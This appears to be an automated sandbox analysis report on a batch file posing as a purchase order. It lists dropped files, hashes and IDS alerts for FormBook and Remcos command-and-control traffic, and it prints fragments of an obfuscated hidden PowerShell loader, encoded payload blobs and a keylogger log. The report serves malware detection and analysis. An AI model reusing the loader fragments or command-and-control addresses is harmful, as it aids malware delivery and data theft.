                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):27724
                                                          Entropy (8bit):5.249757392580612
                                                          Encrypted:false
                                                          SSDEEP:768:kkLQ0qWMSjljbdC1yyWiTfQvx/nkl4gr/Mg8/:kn0eClUtanYr/z8/
                                                          MD5:BFC67754721884CC0140E7534EAA0F61
                                                          SHA1:2E59368919AFB98121950C73F03429F530F295B3
                                                          SHA-256:388B073997E4C52EC96B4C55EB00667B4C4A4D1A3BEC85431E38C7683D313B45
                                                          SHA-512:290CEA431CF5F8B8BFA4687DE431ACC1B7F3A48124079CE59B1D76D29605A8586C62072CAAA22AF51091B17582F998232CBE19BC33B9DA174F09160F24E8BD87
                                                          Malicious:true
                                                          Preview:..................Tricalcichypotaxic = FormatCurrency(8841128)............Function Rkkende ()....For I = 1566 To 84 step - 1..Chondriosphere = Chondriosphere & "Minatories"..next....blufrdighedens = blufrdighedens & "If (${hoswo"..Const Electrostatics = "Nulleder reenumerate:"..Const Mediterraneous = "Unimpearled: haandbevgelsens"..Const Straffende = "Apoteksassistenten! unrepublican."..Const Politikommissrers = &HB584..Const Hyldetrer = 26206..Const Koreografis = "Garderkasernes: vouching3?"..Const Vitriolling = "Fordelingsposter horisonts?"..Const Halvvaagne = -17648..Const Denver = &HB5ED..Const Thebaic119 = "Tillites13 hydras!"..Const Fllesakten = &HFFFF1BD1..Const blindnesses = "Screwdriver frontend!"..Const Rokningens = &HD0CD..Const Cognizing = -64479..Const Towerier92 = "Bgehj fritillary"..Const unduly = &HD5DB..Const Unrestrainedly = 32887..Const Forgiftningernes159 = &HFFFF0635..Const Smocksyningens135 = "Bruttoregistertonnet. grnsefunktionerne"..Const Absint = 20625..Const S

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22ppql3u.lyk.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55kirasc.kll.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5sfmnaes.4ez.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_htykarzd.z00.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qgf52erv.xzo.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4uslc30.jt3.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sb520ipz.cem.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wactrupg.vkn.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\bhv310C.tmp

                                                          Download File
                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6eec0579, page size 32768, DirtyShutdown, Windows version 10.0
                                                          Category:dropped
                                                          Size (bytes):15728640
                                                          Entropy (8bit):0.10805027086476268
                                                          Encrypted:false
                                                          SSDEEP:1536:+SB2jpSB2jFSjlK/Qw/ZweshzbOlqVqmesAzbIBl73esleszO/Z4zbU/L:+a6aOUueqVRIBYvOU
                                                          MD5:9F6FBA8CABF6D4ECDD5B285F375D352B
                                                          SHA1:ED0D370573441F24C1FEF0F1D7A92DB58AA484D8
                                                          SHA-256:4C764E2DF9F41B915772A2259A958DB29E6476693225882D1FBAE286C22AFB41
                                                          SHA-512:75C78BF6271DBDFE3A044ADF75F84AF49867E63BD614F0A300A676A73A736432C16C2DA686177B01E01BE6018178CCD060FB009DA012AD876BFD632833046A0C
                                                          Malicious:false
                                                          Preview:n..y... ...................':...{........................Z.....9....{S......{w.h.\.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...................................H......{w.................2.G......{w..........................#......h.\.....................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\g7Q9039

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\relog.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):114688
                                                          Entropy (8bit):0.9746603542602881
                                                          Encrypted:false
                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr

                                                          Download File
                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):2
                                                          Entropy (8bit):1.0
                                                          Encrypted:false
                                                          SSDEEP:3:Qn:Qn
                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                          Malicious:false
                                                          Preview:..

                                                          C:\Users\user\AppData\Roaming\Belinda103.Eft

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):462320
                                                          Entropy (8bit):5.949052812982134
                                                          Encrypted:false
                                                          SSDEEP:12288:HFUxNn2n4uYm3RE73oYc7BKZupikLZ1CmdYFqP37:lEN259E6/t2m1
                                                          MD5:57B90FD435B223BE1197BF2C261BC942
                                                          SHA1:D10B30FE2E5A5656DD6E6ED7A3299FFE3CFA4F5C
                                                          SHA-256:D798DA8EE8AD968C48094F2C59A3A0F57BE04360D74AD388DFA9E05399E066D9
                                                          SHA-512:897B50909094736E8FD452F7F987454963DBA11225F7E1BD2F09CB7ABDFA7B89865EC73BD9C87FF17FC5FC2CE4270799395E26A4278AA6E16A2B44F43194EEB2
                                                          Malicious:false
                                                          Preview:6wJdcOsC9F67Ej0cAHEBm+sCLTYDXCQE6wI06+sC0CS5uS1IWHEBm+sCiaiB6U6G8mJxAZvrAtGxgcGVWKoKcQGbcQGb6wJCpesCtX26EBCeB3EBm3EBm+sCdspxAZsxynEBm3EBm4kUC3EBm+sCucnR4nEBm3EBm4PBBHEBm+sCvieB+a7FaAJ8zXEBm3EBm4tEJARxAZtxAZuJw3EBm+sCu5uBw5t7XgHrAtLNcQGbus1hQ77rArbb6wLOX4HyZh7fmHEBm+sC3O6B6qt/nCbrAsYjcQGb6wKsgnEBm3EBm+sCxMSLDBDrAm3P6wIh+YkME+sCuHFxAZtC6wJEXOsCFF+B+njhBAB103EBm+sCAOyJXCQM6wJ4+OsCyd2B7QADAADrAoTkcQGbi1QkCHEBm3EBm4t8JARxAZvrAqHvietxAZtxAZuBw5wAAADrAnsv6wJBfVNxAZtxAZtqQHEBm3EBm4nrcQGb6wKwiMeDAAEAAAAQiAJxAZvrApapgcMAAQAAcQGb6wLrd1PrAkDA6wI0dInrcQGb6wL7cIm7BAEAAHEBm+sCfSqBwwQBAABxAZtxAZtTcQGb6wJYYGr/cQGb6wLBJIPCBXEBm3EBmzH26wKmUusCh7wxyXEBm+sCXneLGnEBm3EBm0FxAZtxAZs5HAp19HEBm+sClsxG6wLcBHEBm4B8Cvu4dd7rAuPJ6wKFE4tECvzrAmtc6wLGFSnwcQGbcQGb/9JxAZvrAnP6unjhBADrAr0v6wLNnDHAcQGb6wKKOot8JAxxAZvrAqdcgTQH8ZYgkXEBm+sCH46DwARxAZvrAkOHOdB15OsC76/rAhR6ifvrAoUbcQGb/9frAvlF6wK1QnVjRqgoH8VWtCI80vBjoeRFYO+zRBdVJXPkaTtw45T5DPzK3Q7blOQLw9dXLGJv+XhzoGhtL7OBZmehYISE3BdwaEpFFbChYP9DDCJwZ9BGtlLn1fyWOMNN5UZmMq5KEIWb

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6221
                                                          Entropy (8bit):3.7338503071064486
                                                          Encrypted:false
                                                          SSDEEP:96:GDUknJe33CxHltGkvhkvCCtN2Re3dHvjRe3eHvq:GDUkJeyFtSN2RIjRBq
                                                          MD5:1D6D532A510B967815CC9A8663CE8EFF
                                                          SHA1:6E0250DE4AEFAD878B0FE36CE36AF5694110C5D5
                                                          SHA-256:80619C905AEB5B94489C9943B346E62899891348AEA70A01AFD0F14609942549
                                                          SHA-512:928F39CFA71B39076C2DEA4DA91AC85D672BB9FA6E22118401D54023A183D36973A5BE09371BB24A6A8BBE4EECA19E86BF058B00E374F78D47FA3B807AF4E1A8
                                                          Malicious:false
                                                          Preview:...................................FL..................F.".. ...-/.v.....5o.A...z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....C..A....\v.A.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y#`...........................%..A.p.p.D.a.t.a...B.V.1......Y!`..Roaming.@......CW.^.Y!`..........................$...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y$`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWT`..Windows.@......CW.^DWT`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y%`....Q...........

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ARZTWOM2N06S30R4R4G5.temp

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6221
                                                          Entropy (8bit):3.7338503071064486
                                                          Encrypted:false
                                                          SSDEEP:96:GDUknJe33CxHltGkvhkvCCtN2Re3dHvjRe3eHvq:GDUkJeyFtSN2RIjRBq
                                                          MD5:1D6D532A510B967815CC9A8663CE8EFF
                                                          SHA1:6E0250DE4AEFAD878B0FE36CE36AF5694110C5D5
                                                          SHA-256:80619C905AEB5B94489C9943B346E62899891348AEA70A01AFD0F14609942549
                                                          SHA-512:928F39CFA71B39076C2DEA4DA91AC85D672BB9FA6E22118401D54023A183D36973A5BE09371BB24A6A8BBE4EECA19E86BF058B00E374F78D47FA3B807AF4E1A8
                                                          Malicious:false
                                                          Preview:...................................FL..................F.".. ...-/.v.....5o.A...z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....C..A....\v.A.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y#`...........................%..A.p.p.D.a.t.a...B.V.1......Y!`..Roaming.@......CW.^.Y!`..........................$...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y$`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWT`..Windows.@......CW.^DWT`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y%`....Q...........

                                                          C:\Users\user\AppData\Roaming\Negligent.Gas

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):421524
                                                          Entropy (8bit):5.956998934075221
                                                          Encrypted:false
                                                          SSDEEP:12288:/skcXpnpPnPp6GCOfM37gGA8zUBSzaX8xfzks:/sk2ptnAOPfa8SBz
                                                          MD5:C307CFEB8434B059E8B0FA985D12DAFD
                                                          SHA1:978BC8A0010D25CB355A4C059BF433EFD8613C32
                                                          SHA-256:2C382E87B37C4A9404F3A7B445D2071B9B8EE1CF893998F606188AB3091457D2
                                                          SHA-512:D26779CB4CCC561849BC7364097715323F87D1581FA7A1E1A3DE3F4976E2D627480B5BDB1A05E8088DBD8EE4F5E321E8D96397E96F72B77E263B4EC16F48A436
                                                          Malicious:false
                                                          Preview:cQGbcQGbu9QhCwBxAZvrAhafA1wkBHEBm+sClHe5qby1O3EBm+sCi5SB8b4qv5xxAZvrAtZKgcHpafVYcQGb6wLdEnEBm3EBm7pO/50VcQGbcQGb6wLNE+sCrS4xyusCMydxAZuJFAvrAoTg6wIxstHicQGbcQGbg8EE6wJVpOsClZGB+eywAwR8yXEBm+sCe4mLRCQE6wIW1usCDKqJw3EBm3EBm4HDWZODA+sC/KDrAkbFuslUUrjrAk70cQGbgfLrdsCUcQGb6wLHuYHqIiKSLOsC8mdxAZvrAsYbcQGbcQGbcQGbiwwQcQGbcQGbiQwT6wLHvHEBm0JxAZvrApRpgfq8ZwQAdddxAZvrAogIiVwkDHEBm+sCz2iB7QADAADrAjm+6wKY2YtUJAhxAZtxAZuLfCQEcQGb6wKhuInr6wKK5esC7huBw5wAAADrAjvBcQGbU+sCOsDrAo5hakDrAisI6wLlWInrcQGb6wIFgseDAAEAAADgEQTrAuym6wIYI4HDAAEAAHEBm+sC4slTcQGb6wLgM4nrcQGbcQGbibsEAQAAcQGbcQGbgcMEAQAA6wJ6QXEBm1NxAZvrAj2Vav9xAZtxAZuDwgVxAZtxAZsx9usCnEpxAZsxyXEBm3EBm4sa6wJM5XEBm0HrAhl56wKcHzkcCnXycQGbcQGbRusCgaxxAZuAfAr7uHXdcQGbcQGbi0QK/HEBm3EBmynw6wI7h3EBm//S6wJRzHEBm7q8ZwQAcQGb6wICdzHAcQGbcQGbi3wkDHEBm3EBm4E0B6R0PgjrAjlFcQGbg8AEcQGbcQGbOdB15XEBm+sCfa2J++sCcyrrApDj/9frAm2z6wJIiS2R+Y2zi8H3ZTvlZSXBKfdbi0fyW7W/vbOLwfdq5GieJcEp91uLSC7WTnL3KWPB91sByV0tkYcVHg3ciVVLwBWM9f+3u4caiU29XV9LTNDP4Hk+6HLnq4x+9UoFpCAjLSTw224lihlx

                                                          C:\Users\user\AppData\Roaming\sfvnspt.dat

                                                          Download File
                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):558
                                                          Entropy (8bit):3.3147222285753926
                                                          Encrypted:false
                                                          SSDEEP:12:6ldecmlfQclabWFe5UlnlvbWFepie5UlruYclrnAbW+:6GcmdQckWqUdJWGUAjaW+
                                                          MD5:412DFDB3346CCA6A5A77EBEA0CB0387E
                                                          SHA1:15C20D1C99D6B57574425EA8229E92679E2F9CC8
                                                          SHA-256:511D2D85A0C20D2DF2DD14CCC7323E6AE99DF63219931A970A527007CDAC2BFB
                                                          SHA-512:56DA958CCDBD1A46DE5FFEFD61014B855058CCF5941350975B26AC66FFEBF5F911B748969E9F4EB52F8CC7AE41B18F40A385D66AFF12CE5F898A4E4CA578A30C
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\sfvnspt.dat, Author: Joe Security
                                                          Preview:....[.2.0.2.4./.0.8./.2.8. .0.8.:.0.1.:.5.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.0.8./.2.8. .0.8.:.0.1.:.5.3. .R.u.n.].........[.2.0.2.4./.0.8./.2.8. .0.8.:.0.1.:.5.3. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.0.8./.2.8. .0.8.:.0.1.:.5.7. .R.u.n.].........[.2.0.2.4./.0.8./.2.8. .0.8.:.0.2.:.0.0. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.[.W.i.n.].r.....[.2.0.2.4./.0.8./.2.8. .0.8.:.0.3.:.0.1. .R.u.n.].........[.2.0.2.4./.0.8./.2.8. .0.8.:.0.3.:.3.9. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                          Static File Info

                                                          General

                                                          File type:ASCII text, with very long lines (4349), with no line terminators
                                                          Entropy (8bit):5.411198223907365
                                                          TrID:
                                                            File name:PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat
                                                            File size:4'349 bytes
                                                            MD5:a7cf853aab7a489baa2e3fc8e31ab25f
                                                            SHA1:b114e9292f9c733594bc058fbec8f7ed63bfc208
                                                            SHA256:5f6652b2b1984430374890d518550109bcef83b980557b985e502e70e80a7392
                                                            SHA512:462411feea2d8730c528dba83e232d5401efb209b774ee02c5c78811d1ad6546dee6a6c33db83f0b5b8001aa5694c448b6d010b204a246b46f1c43c68301f391
                                                            SSDEEP:96:mMHCq5motGI0XJ+lMd7XaHtAtY/w58ew0LAQaBC:mc5motGI0mMd7YtFwCewpC
                                                            TLSH:D391195B1C5E924D85648E144C19D6881AE6C686F10B0F0BE39CD08A0B9DE283F3FDB9
                                                            File Content Preview:start /min powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftsko

                                                            File Icon

                                                            Icon Hash:9686878b929a9886

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                            2024-08-28T14:04:42.147766+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976880192.168.2.43.33.130.190
                                                            2024-08-28T14:04:15.934465+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976080192.168.2.4188.114.96.3
                                                            2024-08-28T14:03:08.970058+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214974580192.168.2.43.33.130.190
                                                            2024-08-28T14:04:44.668227+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214976980192.168.2.43.33.130.190
                                                            2024-08-28T14:02:33.150777+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa24974480192.168.2.4193.25.216.165
                                                            2024-08-28T14:04:05.109115+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214975780192.168.2.43.33.130.190
                                                            2024-08-28T14:01:49.458361+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa249737443192.168.2.4104.21.62.202
                                                            2024-08-28T14:04:10.871771+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975880192.168.2.4188.114.96.3
                                                            2024-08-28T14:03:43.242699+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975080192.168.2.45.78.41.174
                                                            2024-08-28T14:04:29.050512+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976480192.168.2.434.149.87.45
                                                            2024-08-28T14:03:59.981894+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975580192.168.2.43.33.130.190
                                                            2024-08-28T14:01:55.733878+0200TCP2032777ET MALWARE Remcos 3.x Unencrypted Server Response15748449738172.111.137.132192.168.2.4
                                                            2024-08-28T14:03:25.070543+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974680192.168.2.4162.241.2.92
                                                            2024-08-28T14:05:12.409303+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214977780192.168.2.4203.161.41.205
                                                            2024-08-28T14:04:39.621945+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976780192.168.2.43.33.130.190
                                                            2024-08-28T14:05:09.964722+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314977680192.168.2.4203.161.41.205
                                                            2024-08-28T14:05:18.919734+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314977880192.168.2.464.46.102.70
                                                            2024-08-28T14:04:24.326359+0200TCP2032777ET MALWARE Remcos 3.x Unencrypted Server Response15748449738172.111.137.132192.168.2.4
                                                            2024-08-28T14:04:23.975590+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976280192.168.2.434.149.87.45
                                                            2024-08-28T14:03:27.599191+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974780192.168.2.4162.241.2.92
                                                            2024-08-28T14:01:55.002482+0200TCP2032776ET MALWARE Remcos 3.x Unencrypted Checkin14973857484192.168.2.4172.111.137.132
                                                            2024-08-28T14:03:45.776632+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975180192.168.2.45.78.41.174
                                                            2024-08-28T14:03:32.741111+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214974980192.168.2.4162.241.2.92
                                                            2024-08-28T14:04:53.283615+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314977180192.168.2.4142.250.186.147
                                                            2024-08-28T14:04:51.095333+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314977080192.168.2.4142.250.186.147
